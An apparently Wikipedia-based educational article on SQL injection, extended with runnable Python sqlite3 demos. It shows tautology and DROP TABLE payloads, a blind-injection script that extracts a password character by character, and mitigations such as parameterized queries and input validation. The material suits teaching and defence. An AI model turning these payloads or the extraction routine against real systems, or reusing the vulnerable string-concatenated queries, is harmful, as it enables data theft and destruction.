SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (for example, to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in the application software, for example when user input is incorrectly filtered for string literal escape characters embedded in SQL statements, or when user input is not strongly typed and is executed unexpectedly. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
In a 2012 study, it was observed that the average web application received four attack campaigns per month, and retailers received twice as many attacks as other industries.
History
The first public discussions of SQL injection began to appear around 1998; for example, in a 1998 article in Phrack Magazine.
Forms
SQL injection (SQLI) was considered one of the top 10 web application vulnerabilities of 2007 and 2010 by the Open Web Application Security Project (OWASP). In 2013, SQLI was rated the number one attack on the OWASP top ten. There are four main sub-classes of SQL injection:
- Classic SQLI
- Blind or inference SQLI
- Database management system-specific SQLI
- Compounded SQLI:
  - SQL injection + insufficient authentication
  - SQL injection + DDoS attacks
  - SQL injection + DNS hijacking
  - SQL injection + XSS
The Storm Worm is one representation of compounded SQLI.
This classification represents the state of SQLI, respecting its evolution until 2010; further refinement is underway.
Technical implementation
Incorrectly filtered escape characters
This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement. This results in the potential manipulation of the statements performed on the database by the end user of the application.
The following line of code illustrates this vulnerability:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
This SQL code is designed to pull up the records of the specified username from its table of users. However, if the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable as:
' OR '1'='1
or using comments to even block the rest of the query (there are three types of SQL comments; all three lines have a space at the end):
' OR '1'='1' --
' OR '1'='1' {
' OR '1'='1' /*
renders one of the following SQL statements by the parent language:
SELECT * FROM users WHERE name = '' OR '1'='1';
SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
If this code were to be used in an authentication procedure, this example could be used to force the selection of every data field (*) from all users rather than from one specific username as the coder intended, because the evaluation of '1'='1' is always true.
The following value of "userName" in the statement below would cause the deletion of the "users" table as well as the selection of all data from the "userinfo" table (in essence revealing the information of every user), using an API that allows multiple statements:
a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't
This input renders the final SQL statement as follows:
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
While most SQL server implementations allow multiple statements to be executed with one call in this way, some SQL APIs such as PHP's mysql_query() function do not allow this for security reasons. This prevents attackers from injecting entirely separate queries, but does not stop them from modifying queries.
Incorrect type handling
This form of SQL injection occurs when a user-supplied field is not strongly typed or is not checked for type constraints. This could take place when a numeric field is to be used in an SQL statement, but the programmer makes no checks to validate that the user-supplied input is numeric. For example:
statement := "SELECT * FROM userinfo WHERE id = " + a_variable + ";"
It is clear from this statement that the author intended a_variable to be a number correlating to the "id" field. However, if it is in fact a string then the end user may manipulate the statement as they choose, thereby bypassing the need for escape characters. For example, setting a_variable to
1;DROP TABLE users
will drop (delete) the "users" table from the database, since the SQL becomes:
SELECT * FROM userinfo WHERE id=1;DROP TABLE users;
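The two forms above (incorrectly filtered escape characters and incorrect type handling), run end to end as an added example; this is not code from the original article. It uses Python's built-in sqlite3 module with an in-memory database and constructed sample rows in place of MySQL, and its function names are hypothetical. It also shows the point made about mysql_query(): sqlite3's execute() likewise refuses a second statement, while executescript() is a multi-statement API and lets the stacked DROP TABLE through.

```python
import sqlite3


def make_db():
    """Constructed sample data for this demo (not from the original article)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'hunter2'), ('bob', 'swordfish');
        CREATE TABLE userinfo (id INTEGER, name TEXT, email TEXT);
        INSERT INTO userinfo VALUES (1, 'alice', 'alice@example.com'),
                                    (2, 'bob', 'bob@example.com');
    """)
    return conn


def build_user_query(user_name):
    """The article's vulnerable construction: the input is pasted into the SQL text."""
    return "SELECT * FROM users WHERE name = '" + user_name + "';"


def build_info_query(a_variable):
    """The 'incorrect type handling' form: a numeric field, no type check, no quotes."""
    return "SELECT * FROM userinfo WHERE id = " + a_variable + ";"


def find_users(conn, user_name):
    """Runs build_user_query() through the single-statement execute() API."""
    return conn.execute(build_user_query(user_name)).fetchall()


def table_exists(conn, name):
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row[0] == 1


def tautology_bypass(conn):
    """' OR '1'='1 closes the literal early and ORs in a condition that is always
    true, so the WHERE clause matches every row."""
    return find_users(conn, "' OR '1'='1")


def comment_truncation(conn):
    """The trailing -- comments out the closing quote the code appends, so the
    statement stays syntactically valid although the attacker supplied a quote."""
    return find_users(conn, "' OR '1'='1' -- ")


def stacked_statements_rejected(conn):
    """sqlite3's execute() refuses a second statement, as the text says mysql_query()
    does. Returns 'refused' if the API blocked the stacked DROP TABLE."""
    payload = "a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't"
    try:
        conn.execute(build_user_query(payload))
    except (sqlite3.Warning, sqlite3.Error):
        # Python <= 3.11 raises sqlite3.Warning, 3.12+ sqlite3.ProgrammingError
        return "refused"
    return "executed"


def numeric_injection_multi_statement(conn):
    """executescript() accepts several statements. With an unquoted numeric field the
    attacker needs no quote at all: '1; DROP TABLE users' ends the SELECT and appends
    a DROP. Returns whether the users table survived."""
    conn.executescript(build_info_query("1; DROP TABLE users"))
    return table_exists(conn, "users")


if __name__ == "__main__":
    db = make_db()
    print("bypass rows:", tautology_bypass(db))
    print("stacked via execute():", stacked_statements_rejected(db))
    print("users table after executescript():", numeric_injection_multi_statement(db))
```

The refusal by execute() only blocks the stacked statement; the tautology and comment payloads still go through it, which is exactly the "does not stop them from modifying queries" caveat.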
Blind SQL injection
Blind SQL injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page. This type of attack has traditionally been considered time-intensive because a new statement had to be crafted for each bit recovered, and depending on its structure, the attack may consist of many unsuccessful requests. Recent advances have allowed each request to recover multiple bits, with no unsuccessful requests, allowing more consistent and efficient extraction. There are several tools that can automate these attacks once the location of the vulnerability and the target information have been established.
Conditional responses
One type of blind SQL injection forces the database to evaluate a logical statement on an ordinary application screen. As an example, a book review website uses a query string to determine which book review to display. So the URL http://books.example.com/showReview.php?ID=5
would cause the server to run the query
SELECT * FROM bookreviews WHERE ID = 5;
from which it would populate the review page with data from the review with ID 5, stored in the table bookreviews. The query happens completely on the server; the user does not know the names of the database, table, or fields, nor does the user know the query string. The user only sees that the above URL returns a book review. An attacker can load the URLs http://books.example.com/showReview.php?ID=5 AND 1=1 and http://books.example.com/showReview.php?ID=5 AND 1=2
, which may result in the queries
SELECT * FROM bookreviews WHERE ID = 5 AND 1=1;
SELECT * FROM bookreviews WHERE ID = 5 AND 1=2;
respectively. If the original review loads with the "1=1" URL and a blank or error page is returned from the "1=2" URL, and the returned page has not been created to alert the user of invalid input (in other words, the request has not been caught by an input test script), the site is likely vulnerable to an SQL injection attack, since the query will have passed through successfully in both cases. The attacker may proceed with a query string designed to reveal the version number of MySQL running on the server: http://books.example.com/showReview.php?ID=5 AND substring(@@version, 1, INSTR(@@version, '.') - 1) = 4
, which would show the book review on a server running MySQL 4 and a blank or error page otherwise. The attacker can continue to use code within query strings to glean more information from the server until another avenue of attack is discovered or the goal is reached.
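The conditional-response technique above, carried through as an added example (not code from the original article): a stand-in for showReview.php that leaks only "review shown / not shown", the 1=1 / 1=2 probe, the major-version check, and then character-by-character extraction of a value the attacker never sees. It uses Python's sqlite3 with an in-memory database and constructed rows in place of MySQL, so sqlite_version() stands in for @@version and SQLite's substr()/instr()/unicode() for the MySQL functions; the table and function names are hypothetical. It goes one step beyond the text by binary-searching each character's code point, which is why it needs about eight requests per character rather than one per candidate value.

```python
import sqlite3


def make_db():
    """Constructed sample data for this demo (not from the original article)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE bookreviews (ID INTEGER, title TEXT, body TEXT);
        INSERT INTO bookreviews VALUES (5, 'Dune', 'Worth reading twice.');
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'S3cret!');
    """)
    return conn


def show_review(conn, raw_id):
    """Stand-in for showReview.php. All the attacker can observe is whether a review
    rendered (True) or the page came back blank or with an error (False)."""
    sql = "SELECT title FROM bookreviews WHERE ID = " + raw_id + ";"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


class Oracle:
    """Wraps the page as a yes/no oracle: ?ID=5 AND (<condition>)."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        return show_review(self.conn, "5 AND (" + condition + ")")


def looks_vulnerable(oracle):
    """The article's probe: a review for 1=1, nothing for 1=2."""
    return oracle.ask("1=1") and not oracle.ask("1=2")


def major_version_is(oracle, major):
    """SQLite counterpart of the article's MySQL payload
    substring(@@version, 1, INSTR(@@version, '.') - 1) = 4."""
    return oracle.ask(
        "substr(sqlite_version(), 1, instr(sqlite_version(), '.') - 1) = '" + major + "'"
    )


def extract_string(oracle, expr, max_len=64):
    """Recover the value of an SQL string expression one character at a time.
    Each code point (0..127) is found by binary search, about 8 requests per character."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle.ask(f"length({expr}) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    oracle = Oracle(make_db())
    print("vulnerable:", looks_vulnerable(oracle))
    print("version:", extract_string(oracle, "sqlite_version()"))
    print("admin password:",
          extract_string(oracle, "(SELECT password FROM users WHERE name = 'admin')"))
    print("requests used:", oracle.requests)
```

Note that every probe is a syntactically valid query that returns either the real review or nothing, so nothing in the server's logs distinguishes the extraction from ordinary traffic except the volume of requests to the same ID.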
Second order SQL injection
Second order SQL injection occurs when submitted values contain malicious commands that are stored rather than executed immediately. In some cases, the application may correctly encode an SQL statement and store it as valid SQL. Then, another part of the application without controls to protect against SQL injection might execute that stored SQL statement. This attack requires more knowledge of how submitted values are later used. Automated web application security scanners will not easily detect this type of SQL injection and may need to be manually instructed where to check for evidence that it is being attempted.
Mitigation
SQL injection is a well known attack and is easily prevented by simple measures. After an apparent SQL injection attack on TalkTalk in 2015, the BBC reported that security experts were stunned that such a large company would be vulnerable to it.
Parameterized statements
With most development platforms, parameterized statements that work with parameters can be used (sometimes called placeholders or bind variables) instead of embedding user input in the statement. A placeholder can only store a value of the given type and not an arbitrary SQL fragment. Hence the SQL injection would simply be treated as a strange (and probably invalid) parameter value.
In many cases, the SQL statement is fixed, and each parameter is a scalar, not a table. The user input is then assigned (bound) to a parameter.
Enforcement at the coding level
Using object-relational mapping libraries avoids the need to write SQL code. The ORM library in effect generates parameterized SQL statements from object-oriented code.
Escaping
A straightforward, though error-prone, way to prevent injections is to escape characters that have a special meaning in SQL. The manual for an SQL DBMS explains which characters have a special meaning, which allows creating a comprehensive blacklist of characters that need translation. For instance, every occurrence of a single quote (') in a parameter must be replaced by two single quotes ('') to form a valid SQL string literal. For example, in PHP it is usual to escape parameters using the function mysqli_real_escape_string() before sending the SQL query.
This function prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a. It is normally used to make data safe before sending a query to MySQL.
PHP has similar functions for other database systems such as pg_escape_string() for PostgreSQL. The function addslashes(string $str) works for escaping characters, and is used especially for querying databases that do not have escaping functions in PHP. It returns a string with backslashes before characters that need to be escaped in database queries, etc. These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
Routinely passing escaped strings to SQL is error-prone because it is easy to forget to escape a given string. Creating a transparent layer to secure the input can reduce this error-proneness, if not entirely eliminate it.
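The quote-doubling rule described above, beside a parameterized query, as an added example that is not code from the original article. It uses Python's sqlite3 with an in-memory database and constructed rows; the function names are hypothetical. SQLite has no backslash escapes, so for it doubling the single quote is the complete rule (mysqli_real_escape_string() handles more characters for MySQL). The point a practitioner should take away is the second function: escaping only protects a value that sits inside a quoted string literal, so it does nothing for the unquoted numeric field of the "incorrect type handling" section, whereas a placeholder protects both.

```python
import sqlite3


def make_db():
    """Constructed sample data for this demo (not from the original article)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'hunter2'), ('O''Brien', 'shamrock');
        CREATE TABLE userinfo (id INTEGER, name TEXT);
        INSERT INTO userinfo VALUES (1, 'alice'), (2, 'O''Brien');
    """)
    return conn


def escape_sql_string(value):
    """The rule given in the text for a standard SQL string literal: every single
    quote becomes two single quotes."""
    return value.replace("'", "''")


def find_user_escaped(conn, user_name):
    """Escaping applied correctly: the value sits inside a quoted literal, so a
    quote in the input can no longer terminate the literal."""
    sql = "SELECT name FROM users WHERE name = '" + escape_sql_string(user_name) + "';"
    return [row[0] for row in conn.execute(sql)]


def find_info_escaped_unquoted(conn, a_variable):
    """The same escaping applied to an unquoted numeric field. There is no quote to
    break out of, so escaping changes nothing and the input is still parsed as SQL."""
    sql = "SELECT name FROM userinfo WHERE id = " + escape_sql_string(a_variable) + ";"
    return [row[0] for row in conn.execute(sql)]


def find_info_param(conn, a_variable):
    """Placeholder version: the whole input is one value, never SQL text. A string
    that is not a well-formed number simply matches nothing in the INTEGER column."""
    return [row[0] for row in
            conn.execute("SELECT name FROM userinfo WHERE id = ?", (a_variable,))]


if __name__ == "__main__":
    db = make_db()
    print(find_user_escaped(db, "O'Brien"))            # legitimate quote preserved
    print(find_user_escaped(db, "' OR '1'='1"))        # payload is now a literal: []
    print(find_info_escaped_unquoted(db, "1 OR 1=1"))  # both rows: escaping did not help
    print(find_info_param(db, "1 OR 1=1"))             # []
```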
Pattern check
Integer, float or boolean, string parameters can be checked to see if their value is a valid representation for the given type. Strings that must follow some strict pattern (date, UUID, alphanumeric only, etc.) can be checked to see if they match this pattern.
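Pattern checks for the three kinds of value the paragraph names, in front of parameterized queries, as an added example that is not code from the original article. It uses Python's sqlite3 with an in-memory database and constructed rows; the function names and the bookreviews columns are hypothetical. Two details matter in practice: Python's int() is too lenient for validation (it accepts " 5", "+5" and "1_000"), so the shape is pinned with a regular expression first; and a user-chosen column name cannot be bound as a parameter at all, which is why the last function uses an allow-list rather than any escaping.

```python
import datetime
import re
import sqlite3
import uuid


def make_db():
    """Constructed sample data for this demo (not from the original article)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE bookreviews (ID INTEGER, title TEXT, posted TEXT);
        INSERT INTO bookreviews VALUES (5, 'Dune', '2024-03-01'), (7, 'Ubik', '2024-01-15');
    """)
    return conn


def validate_int(raw):
    """Digits only. int() alone would also accept ' 5', '+5' and '1_000'."""
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError(f"not an integer id: {raw!r}")
    return int(raw)


def validate_date(raw):
    """ISO date: the regex pins the shape, fromisoformat() rejects impossible dates."""
    if not re.fullmatch(r"[0-9]{4}-[0-9]{2}-[0-9]{2}", raw):
        raise ValueError(f"not an ISO date: {raw!r}")
    return datetime.date.fromisoformat(raw).isoformat()


def validate_uuid(raw):
    """uuid.UUID() parses and normalises; anything else raises ValueError."""
    return str(uuid.UUID(raw))


def fetch_review_title(conn, raw_id):
    review_id = validate_int(raw_id)  # '5 AND 1=2' never reaches the database
    row = conn.execute("SELECT title FROM bookreviews WHERE ID = ?", (review_id,)).fetchone()
    return row[0] if row else None


def reviews_since(conn, raw_date):
    since = validate_date(raw_date)
    return [r[0] for r in conn.execute(
        "SELECT title FROM bookreviews WHERE posted >= ? ORDER BY posted", (since,))]


SORT_COLUMNS = {"ID", "title", "posted"}


def reviews_sorted(conn, column):
    """Identifiers cannot be bound as parameters, so the only safe way to accept a
    user-chosen sort column is to compare it against an allow-list."""
    if column not in SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    return [r[0] for r in conn.execute(f'SELECT title FROM bookreviews ORDER BY "{column}"')]


def rejects(func, *args):
    """True if func raises ValueError for these arguments (used by the checks below)."""
    try:
        func(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(fetch_review_title(db, "5"))
    print(rejects(fetch_review_title, db, "5 AND 1=2"))
    print(reviews_sorted(db, "posted"))
    print(rejects(reviews_sorted, db, "title; DROP TABLE bookreviews"))
```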
Database permissions
Limiting the permissions on the database login used by the web application to only what is needed may help reduce the effectiveness of any SQL injection attacks that exploit bugs in the web application.
Source of the article: Wikipedia